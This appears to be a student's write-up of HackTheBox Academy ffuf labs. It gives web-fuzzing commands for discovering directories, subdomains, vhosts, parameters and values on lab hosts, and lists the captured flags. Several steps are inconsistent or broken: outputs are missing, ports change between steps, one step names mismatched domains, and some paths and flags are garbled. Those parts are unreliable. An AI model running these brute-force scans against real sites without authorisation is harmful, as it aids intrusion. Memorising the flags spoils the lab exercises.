JUSTUS KOECH_CS-SA07-24044
ASSIGNMENT: Attacking Web Applications with Ffuf
Overview
Ffuf is a powerful and fast web fuzzer written in Go. It allows security researchers and
penetration testers to discover hidden files, directories, and other web application vulnerabilities
by performing recursive and brute-force searches. Ffuf is known for its speed and flexibility,
making it an excellent tool for CTF challenges.
Step 1: Discovering Hidden Directories
To begin the challenge, we execute Ffuf with a wordlist containing common directory names and
the target URL ffuf -w /usr/share/dirbuster/wordlists/directory-list-2.3-small.txt:FUZZ -u
http://83.136.249.227:50308/FUZZ
. The command looks like this:
Based on the output, Ffuf discovers the following directories:
● /blog (Status: 301, Size: 322)
● /forum (Status: 301, Size: 323)
The directory we need to find in this step is /forum.
Step 2: Fuzzing the ‘/blog’ Directory
In the second step, we need to fuzz the /blog directory and find all the pages within it. One of
these pages is expected to contain a flag. We use Ffuf again to perform the fuzzing operation
with the wordlist and target URL http://83.136.249.227:50308/
After the fuzzing process, Ffuf discovers the following page:
● /blog/home.php (Status: 200, Size: 1046, Words: 438, Lines: 58)
To find the flag, we navigate to the discovered page:
http://83.136.250.34:53339/blog/home.php. The flag is revealed on this page:
Flag: HTB{bru73_f0r_c0mm0n_p455w0rd5}
Step 3: Finding More Files/Directories
In the third step, we continue the search for additional files and directories. One of these
resources should provide us with another flag. We need to apply the knowledge gained so far and
repeat the process.
After exploring further, we find the following URL containing the second
flag:http://83.136.249.227:50308/forum/flag.php
Flag: HTB{fuzz1n6_7h3_w3b!}
Step 4: Discovering the Swag Shop Sub-Domain
In the final step, we perform a sub-domain fuzzing test on hackthebox.eu to discover the online
Swag Shop of HackTheBox. We use Ffuf with a wordlist of subdomains and the target URL ffuf
-w Downloads/subdomains-top1million-5000.txt:FUZZ -u https://FUZZ.inlanefreight.com/
-c -ic -t 200
The command is as follows:
. After scanning, Ffuf discovers the following sub-domain:
Step 5: VHost Fuzzing
The first challenge requires us to perform a VHost fuzzing scan on the domain ‘academy.htb’
and identify any additional VHosts. To accomplish this, we use the ffuf tool with the following
command:
Step 6: Parameter Fuzzing
In the second challenge, we need to run a parameter fuzzing scan on a specific webpage and
determine the accepted parameter. Using the ffuf tool, we execute the following command:
ffuf -w /usr/share/seclists/Discovery/Web-Content/web-extensions.txt:FUZZ -u
http://admin.academy.htb:34138/admin/admin.php?FUZZ=key -fs 798
userff
The scan output indicates that the parameter ‘key’ is accepted by the webpage.
Step 7: Wordlist Creation and POST Request
For the third challenge, we have to create a wordlist called ‘ids.txt,’ identify the accepted value
through a fuzzing scan, and use it in a ‘POST’ request with ‘curl’ to retrieve the flag. Let’s
follow these steps:
1. Create the wordlist ‘ids.txt’ with the desired values.
2. Perform a fuzzing scan using ffuf to identify the accepted value for the 'id' parameter:
ffuf -w ids.txt:FUZZ -u http://admin.academy.htb:40208/admin/admin.php -X POST -d
'id=FUZZ' -H 'Content-Type: application/x-www-form-urlencoded'
The response contains the flag: HTB{p4r4m373r_fuzz1n6_15_k3y!}.
Skills Assessment — Web Fuzzing
Step 1: Sub-Domain/VHost and Extension Fuzzing
In the fourth challenge, we are tasked with running a sub-domain/VHost fuzzing scan on
‘.academy.htb’ and identifying all the sub-domains. We employ ffuf once again:
ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt:FUZZ -u
http://academy.htb:52020/ -H 'Host: FUZZ.academy.htb' -ms 0
The scan output reveals three sub-domains: ‘test.academy.htb,’ ‘archive.academy.htb,’ and
‘faculty.academy.htb.’
2. Before running the page fuzzing scan, it’s recommended to perform an extension fuzzing
scan. The goal is to identify the different extensions accepted by the domains. We can
accomplish this with the following command:
ffuf -w /Downloads/web-extensions.txt:FUZZ -u http://94.237.55.114:47287/indexFUZZ
3. One of the pages you will identify should say ‘You don’t have access!’. What is the full
page URL?
ffuf -w Downloads/directory-list-2.3-small.txt:FUZZ -u
<http://faculty.academy.htb:47287/FUZZ> -recursion -recursion-depth 1 -e .php -v -t 80
index.hph7
courses
linux-security.php7
ttp://faculty.academy.htb:52050/courses/linux-security.php7
Challenge 5: Parameter Identification and Fuzzing
In the fifth challenge, we need to identify the parameters accepted by a specific page obtained in
the previous step. We run the following command to achieve this:
ffuf -w Downloads/burp-parameter-names.txt:FUZZ -u
http://faculty.academy.htb:56050/courses/linux-security.php7 -X POST -d 'FUZZ=key' -H
'Content-Type: application/x-www-form-urlencoded' -fs 774
ffuf -w /opt/useful/SecLists/Discovery/Web-Content/burp-parameter-names.txt:FUZZ -u
http://faculty.academy.htb:30796/courses/linux-security.php7 -X POST -d 'FUZZ=key' -H
'Content-Type: application/x-www-form-urlencoded' -fs 774
The scan output reveals two parameters: ‘user’ and ‘username.’
4.Next, we are required to fuzz the identified parameters with working values to retrieve
the flag. We can accomplish this using the following command:
ffuf -w Downloads xato-net-10-million-usernames.txt:FUZZ -u
http://faculty.academy.htb:56050/courses/linux-security.php7 -X POST -d 'username=FUZZ' -H
'Content-Type: application/x-www-form-urlencoded'
ffuf -wDownloads/xato-net-10-million-usernames.txt:FUZZ -u
http://faculty.academy.htb:56050/courses/linux-security.php7 -X POST -d 'username=FUZZ' -H
'Content-Type: application/x-www-form-urlencoded' -fs 781
The response contains the flag: HTB{w3b_fuzz1n6_m4573r}.
Shareable link: https://academy.hackthebox.com/achievement/327320/54
Conclusion
In this article, we explored the process of solving various web fuzzing challenges encountered in
a CTF competition. We learned how to perform VHost fuzzing, parameter fuzzing, wordlist
creation, and fuzzing scans for sub-domains, extensions, and parameters. By following these
steps and leveraging the ffuf tool, we successfully obtained the desired flags. Web fuzzing is a
crucial skill in the field of cybersecurity, allowing us to discover vulnerabilities and potential
attack vectors.